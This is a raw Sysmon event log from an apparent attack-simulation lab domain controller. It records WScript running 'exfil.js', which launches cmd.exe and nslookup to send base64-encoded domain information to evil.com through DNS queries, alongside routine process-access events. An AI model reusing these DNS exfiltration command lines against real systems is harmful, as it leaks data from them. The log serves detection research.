14:21:38.883{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211442Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.883{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211441Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.883{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211440Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.883{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F2-629A-A444-000000005F02}7856C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211439Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.883{2E1864BB-18E0-629A-6742-000000005F02}39761648C:\Windows\System32\WScript.exe{2E1864BB-18F2-629A-A444-000000005F02}7856C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211438Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.891{2E1864BB-18F2-629A-A444-000000005F02}7856C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Model: t3.2xlarge evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvznrkw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000211437Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.883{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlfskd.tmpMD5=7564BBC357DA8472A939C2EE79A792F5,SHA256=2DBE8B361679ED57394E9EFB1DF40D5559A7E60F6F1F0A6E2904E60B52067C41,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000211436Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.581{00000000-0000-0000-0000-000000000000}4148evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000211435Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.436{00000000-0000-0000-0000-000000000000}4992evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000211434Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.321{00000000-0000-0000-0000-000000000000}1368evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000211433Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.258{00000000-0000-0000-0000-000000000000}488evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000211432Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.186{00000000-0000-0000-0000-000000000000}7840evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000211431Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.105{00000000-0000-0000-0000-000000000000}512evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000211430Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.026{00000000-0000-0000-0000-000000000000}2380evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000211429Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.932{00000000-0000-0000-0000-000000000000}6504evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000211428Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.861{2E1864BB-18F2-629A-A244-000000005F02}79723588C:\Windows\system32\conhost.exe{2E1864BB-18F2-629A-A344-000000005F02}6652C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211427Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.861{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211426Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.861{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211425Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.861{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211424Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.861{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211423Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.861{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F2-629A-A344-000000005F02}6652C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211422Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.861{2E1864BB-18F2-629A-A144-000000005F02}76721772C:\Windows\system32\cmd.exe{2E1864BB-18F2-629A-A344-000000005F02}6652C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211421Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.862{2E1864BB-18F2-629A-A344-000000005F02}6652C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F2-629A-A144-000000005F02}7672C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfskd.tmp 2>&1 10341000x8000000000000000211420Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.830{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F2-629A-A244-000000005F02}7972C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211419Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.830{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F2-629A-A244-000000005F02}7972C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211418Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.830{2E1864BB-18F2-629A-A244-000000005F02}79723588C:\Windows\system32\conhost.exe{2E1864BB-18F2-629A-A144-000000005F02}7672C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211417Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.814{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F2-629A-A244-000000005F02}7972C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211416Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.814{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211415Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.814{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211414Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.814{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211413Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.814{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211412Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.814{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F2-629A-A144-000000005F02}7672C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211411Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.814{2E1864BB-18E0-629A-6742-000000005F02}39767792C:\Windows\System32\WScript.exe{2E1864BB-18F2-629A-A144-000000005F02}7672C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211410Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.818{2E1864BB-18F2-629A-A144-000000005F02}7672C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfskd.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000211409Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.814{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlsol.tmpMD5=13DAE9C9CF6ADD4F8F46BEAD8C3CC212,SHA256=2DEC16DD493989E01C6A3048EE3C7ECCED532832FC7BFFA4BF3297D9C89C0784,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000211408Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.761{2E1864BB-18F2-629A-9F44-000000005F02}16602036C:\Windows\system32\conhost.exe{2E1864BB-18F2-629A-A044-000000005F02}3300C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211407Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.745{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211406Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 